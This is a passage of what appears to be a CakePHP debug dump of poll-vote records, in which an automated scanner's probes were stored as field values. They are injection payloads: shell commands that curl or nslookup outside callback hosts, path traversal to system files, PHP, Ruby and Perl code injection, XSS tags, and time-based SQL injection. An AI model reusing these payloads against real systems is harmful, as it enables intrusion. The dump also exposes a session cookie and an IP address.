'id' => '4381',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3839 => array(
'id' => '4382',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3840 => array(
'id' => '4383',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3841 => array(
'id' => '4384',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3842 => array(
'id' => '4385',
'ip' => '45.137.76.29',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 3843 => array(
'id' => '4386',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3844 => array(
'id' => '4387',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3845 => array(
'id' => '4388',
'ip' => '45.137.76.29',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 3846 => array(
'id' => '4389',
'ip' => '45.137.76.29',
'ip1' => 'echo gjqeup$()\ zbdxco\nz^xyu||a #' &echo gjqeup$()\ zbdxco\nz^xyu||a #|" &echo gjqeup$()\ zbdxco\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3847 => array(
'id' => '4390',
'ip' => '45.137.76.29',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 3848 => array(
'id' => '4391',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3849 => array(
'id' => '4392',
'ip' => '45.137.76.29',
'ip1' => '&echo dznxwi$()\ lenodj\nz^xyu||a #' &echo dznxwi$()\ lenodj\nz^xyu||a #|" &echo dznxwi$()\ lenodj\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3850 => array(
'id' => '4393',
'ip' => '45.137.76.29',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 3851 => array(
'id' => '4394',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3852 => array(
'id' => '4395',
'ip' => '45.137.76.29',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 3853 => array(
'id' => '4396',
'ip' => '45.137.76.29',
'ip1' => 'https://scimat.dz/',
'sondage_id' => '2'
),
(int) 3854 => array(
'id' => '4397',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201&echo ywypuq$()\ vtqgua\nz^xyu||a #' &echo ywypuq$()\ vtqgua\nz^xyu||a #|" &echo ywypuq$()\ vtqgua\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3855 => array(
'id' => '4398',
'ip' => '45.137.76.29',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 3856 => array(
'id' => '4399',
'ip' => '45.137.76.29',
'ip1' => 'https://redirtest.acx/',
'sondage_id' => '2'
),
(int) 3857 => array(
'id' => '4400',
'ip' => '45.137.76.29',
'ip1' => '|echo bxiamr$()\ cgyswc\nz^xyu||a #' |echo bxiamr$()\ cgyswc\nz^xyu||a #|" |echo bxiamr$()\ cgyswc\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3858 => array(
'id' => '4401',
'ip' => '45.137.76.29',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 3859 => array(
'id' => '4402',
'ip' => '45.137.76.29',
'ip1' => 'scimat.dz',
'sondage_id' => '2'
),
(int) 3860 => array(
'id' => '4403',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201|echo luhfuc$()\ gxbecy\nz^xyu||a #' |echo luhfuc$()\ gxbecy\nz^xyu||a #|" |echo luhfuc$()\ gxbecy\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 3861 => array(
'id' => '4404',
'ip' => '45.137.76.29',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 3862 => array(
'id' => '4405',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3863 => array(
'id' => '4406',
'ip' => '45.137.76.29',
'ip1' => '(nslookup -q=cname hitranivdkobf6eddd.bxss.me||curl hitranivdkobf6eddd.bxss.me))',
'sondage_id' => '2'
),
(int) 3864 => array(
'id' => '4407',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3865 => array(
'id' => '4408',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 3866 => array(
'id' => '4409',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3867 => array(
'id' => '4410',
'ip' => '45.137.76.29',
'ip1' => 'redirtest.acx',
'sondage_id' => '2'
),
(int) 3868 => array(
'id' => '4411',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3869 => array(
'id' => '4412',
'ip' => '45.137.76.29',
'ip1' => '$(nslookup -q=cname hitzzvykptxyqe4dea.bxss.me||curl hitzzvykptxyqe4dea.bxss.me)',
'sondage_id' => '2'
),
(int) 3870 => array(
'id' => '4413',
'ip' => '45.137.76.29',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 3871 => array(
'id' => '4414',
'ip' => '45.137.76.29',
'ip1' => ''.gethostbyname(lc('hitwa'.'rkvhwwvxe5e05.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(84).chr(117).chr(90).'',
'sondage_id' => '2'
),
(int) 3872 => array(
'id' => '4415',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3873 => array(
'id' => '4416',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3874 => array(
'id' => '4417',
'ip' => '45.137.76.29',
'ip1' => '&nslookup -q=cname hitjlbhnvhujt8c14a.bxss.me&'\"`0&nslookup -q=cname hitjlbhnvhujt8c14a.bxss.me&`'',
'sondage_id' => '2'
),
(int) 3875 => array(
'id' => '4418',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3876 => array(
'id' => '4419',
'ip' => '45.137.76.29',
'ip1' => '".gethostbyname(lc("hitdo"."sobiasbl69650.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(70).chr(114).chr(84)."',
'sondage_id' => '2'
),
(int) 3877 => array(
'id' => '4420',
'ip' => '45.137.76.29',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 3878 => array(
'id' => '4421',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3879 => array(
'id' => '4422',
'ip' => '45.137.76.29',
'ip1' => '&(nslookup -q=cname hitiundnuaaik6cac9.bxss.me||curl hitiundnuaaik6cac9.bxss.me)&'\"`0&(nslookup -q=cname hitiundnuaaik6cac9.bxss.me||curl hitiundnuaaik6cac9.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 3880 => array(
'id' => '4423',
'ip' => '45.137.76.29',
'ip1' => 'gethostbyname(lc('hitlc'.'rlyoysdf107c4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(88).chr(101).chr(80)',
'sondage_id' => '2'
),
(int) 3881 => array(
'id' => '4424',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3882 => array(
'id' => '4425',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3883 => array(
'id' => '4426',
'ip' => '45.137.76.29',
'ip1' => '|(nslookup -q=cname hitdleahqxhpa0077a.bxss.me||curl hitdleahqxhpa0077a.bxss.me)',
'sondage_id' => '2'
),
(int) 3884 => array(
'id' => '4427',
'ip' => '45.137.76.29',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 3885 => array(
'id' => '4428',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3886 => array(
'id' => '4429',
'ip' => '45.137.76.29',
'ip1' => '`(nslookup -q=cname hitsfnnyxfxbz45d8d.bxss.me||curl hitsfnnyxfxbz45d8d.bxss.me)`',
'sondage_id' => '2'
),
(int) 3887 => array(
'id' => '4430',
'ip' => '45.137.76.29',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 3888 => array(
'id' => '4431',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'&&sleep(27*1000)*hzjzrk&&'',
'sondage_id' => '2'
),
(int) 3889 => array(
'id' => '4432',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3890 => array(
'id' => '4433',
'ip' => '45.137.76.29',
'ip1' => ';(nslookup -q=cname hitfduenbrcol756b8.bxss.me||curl hitfduenbrcol756b8.bxss.me)|(nslookup -q=cname hitfduenbrcol756b8.bxss.me||curl hitfduenbrcol756b8.bxss.me)&(nslookup -q=cname hitfduenbrcol756b8.bxss.me||curl hitfduenbrcol756b8.bxss.me)',
'sondage_id' => '2'
),
(int) 3891 => array(
'id' => '4434',
'ip' => '45.137.76.29',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 3892 => array(
'id' => '4435',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201"&&sleep(27*1000)*tteeol&&"',
'sondage_id' => '2'
),
(int) 3893 => array(
'id' => '4436',
'ip' => '45.137.76.29',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitkzdxxlvfuu2e99f.bxss.me||curl${IFS}hitkzdxxlvfuu2e99f.bxss.me)',
'sondage_id' => '2'
),
(int) 3894 => array(
'id' => '4437',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'||sleep(27*1000)*zbbkds||'',
'sondage_id' => '2'
),
(int) 3895 => array(
'id' => '4438',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3896 => array(
'id' => '4439',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3897 => array(
'id' => '4440',
'ip' => '45.137.76.29',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(122).concat(79).concat(113).concat(74)+(require"socket"
Socket.gethostbyname("hitsh"+"yyytpggw4b224.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 3898 => array(
'id' => '4441',
'ip' => '45.137.76.29',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitswckdmvvuba3048.bxss.me||curl${IFS}hitswckdmvvuba3048.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitswckdmvvuba3048.bxss.me||curl${IFS}hitswckdmvvuba3048.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 3899 => array(
'id' => '4442',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201"||sleep(27*1000)*wamadg||"',
'sondage_id' => '2'
),
(int) 3900 => array(
'id' => '4443',
'ip' => '45.137.76.29',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(106).concat(76).concat(120).concat(66)+(require'socket'
Socket.gethostbyname('hitme'+'ckvrzssie8aa5.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 3901 => array(
'id' => '4444',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3902 => array(
'id' => '4445',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3903 => array(
'id' => '4446',
'ip' => '45.137.76.29',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 3904 => array(
'id' => '4447',
'ip' => '45.137.76.29',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(101).concat(72).concat(99).concat(76)+(require'socket'
Socket.gethostbyname('hitlp'+'thwqvmkrab083.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 3905 => array(
'id' => '4448',
'ip' => '45.137.76.29',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 3906 => array(
'id' => '4449',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3907 => array(
'id' => '4450',
'ip' => '45.137.76.29',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 3908 => array(
'id' => '4451',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3909 => array(
'id' => '4452',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3910 => array(
'id' => '4453',
'ip' => '45.137.76.29',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 3911 => array(
'id' => '4454',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3912 => array(
'id' => '4455',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3913 => array(
'id' => '4456',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3914 => array(
'id' => '4457',
'ip' => '45.137.76.29',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 3915 => array(
'id' => '4458',
'ip' => '45.137.76.29',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 3916 => array(
'id' => '4459',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3917 => array(
'id' => '4460',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3918 => array(
'id' => '4461',
'ip' => '45.137.76.29',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 3919 => array(
'id' => '4462',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3920 => array(
'id' => '4463',
'ip' => '45.137.76.29',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 3921 => array(
'id' => '4464',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3922 => array(
'id' => '4465',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3923 => array(
'id' => '4466',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3924 => array(
'id' => '4467',
'ip' => '45.137.76.29',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 3925 => array(
'id' => '4468',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3926 => array(
'id' => '4469',
'ip' => '45.137.76.29',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 3927 => array(
'id' => '4470',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3928 => array(
'id' => '4471',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3929 => array(
'id' => '4472',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3930 => array(
'id' => '4473',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3931 => array(
'id' => '4474',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'"()&%<zzz><ScRiPt >cSka(9743)</ScRiPt>',
'sondage_id' => '2'
),
(int) 3932 => array(
'id' => '4475',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3933 => array(
'id' => '4476',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3934 => array(
'id' => '4477',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3935 => array(
'id' => '4478',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3936 => array(
'id' => '4479',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3937 => array(
'id' => '4480',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3938 => array(
'id' => '4481',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3939 => array(
'id' => '4482',
'ip' => '45.137.76.29',
'ip1' => ''"()&%<zzz><ScRiPt >cSka(9494)</ScRiPt>',
'sondage_id' => '2'
),
(int) 3940 => array(
'id' => '4483',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3941 => array(
'id' => '4484',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3942 => array(
'id' => '4485',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3943 => array(
'id' => '4486',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3944 => array(
'id' => '4487',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2019703282',
'sondage_id' => '2'
),
(int) 3945 => array(
'id' => '4488',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3946 => array(
'id' => '4489',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3947 => array(
'id' => '4490',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3948 => array(
'id' => '4491',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3949 => array(
'id' => '4492',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3950 => array(
'id' => '4493',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3951 => array(
'id' => '4494',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3952 => array(
'id' => '4495',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3953 => array(
'id' => '4496',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3954 => array(
'id' => '4497',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3955 => array(
'id' => '4498',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3956 => array(
'id' => '4499',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3957 => array(
'id' => '4500',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3958 => array(
'id' => '4501',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3959 => array(
'id' => '4502',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3960 => array(
'id' => '4503',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3961 => array(
'id' => '4504',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3962 => array(
'id' => '4505',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3963 => array(
'id' => '4506',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3964 => array(
'id' => '4507',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3965 => array(
'id' => '4508',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3966 => array(
'id' => '4509',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3967 => array(
'id' => '4510',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3968 => array(
'id' => '4511',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3969 => array(
'id' => '4512',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3970 => array(
'id' => '4513',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3971 => array(
'id' => '4514',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3972 => array(
'id' => '4515',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3973 => array(
'id' => '4516',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3974 => array(
'id' => '4517',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3975 => array(
'id' => '4518',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3976 => array(
'id' => '4519',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3977 => array(
'id' => '4520',
'ip' => '45.137.76.29',
'ip1' => '-1 OR 2+600-600-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3978 => array(
'id' => '4521',
'ip' => '45.137.76.29',
'ip1' => '-1 OR 2+526-526-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 3979 => array(
'id' => '4522',
'ip' => '45.137.76.29',
'ip1' => '-1' OR 2+289-289-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3980 => array(
'id' => '4523',
'ip' => '45.137.76.29',
'ip1' => '-1' OR 2+84-84-1=0+0+0+1 or 'qz2WFES2'='',
'sondage_id' => '2'
),
(int) 3981 => array(
'id' => '4524',
'ip' => '45.137.76.29',
'ip1' => '-1" OR 2+436-436-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 3982 => array(
'id' => '4525',
'ip' => '45.137.76.29',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 3983 => array(
'id' => '4526',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2010'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 3984 => array(
'id' => '4527',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2010"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 3985 => array(
'id' => '4528',
'ip' => '45.137.76.29',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 3986 => array(
'id' => '4529',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 3987 => array(
'id' => '4530',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac20132tdbXnR'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 3988 => array(
'id' => '4531',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201NEdvALJv' OR 864=(SELECT 864 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3989 => array(
'id' => '4532',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201mRmq5xcU') OR 536=(SELECT 536 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3990 => array(
'id' => '4533',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac2016d57aTN2')) OR 734=(SELECT 734 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 3991 => array(
'id' => '4534',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'',
'sondage_id' => '2'
),
(int) 3992 => array(
'id' => '4535',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3993 => array(
'id' => '4536',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201'"',
'sondage_id' => '2'
),
(int) 3994 => array(
'id' => '4537',
'ip' => '45.137.76.29',
'ip1' => '@@Btkpf',
'sondage_id' => '2'
),
(int) 3995 => array(
'id' => '4538',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3996 => array(
'id' => '4539',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3997 => array(
'id' => '4540',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3998 => array(
'id' => '4541',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 3999 => array(
'id' => '4542',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4000 => array(
'id' => '4543',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
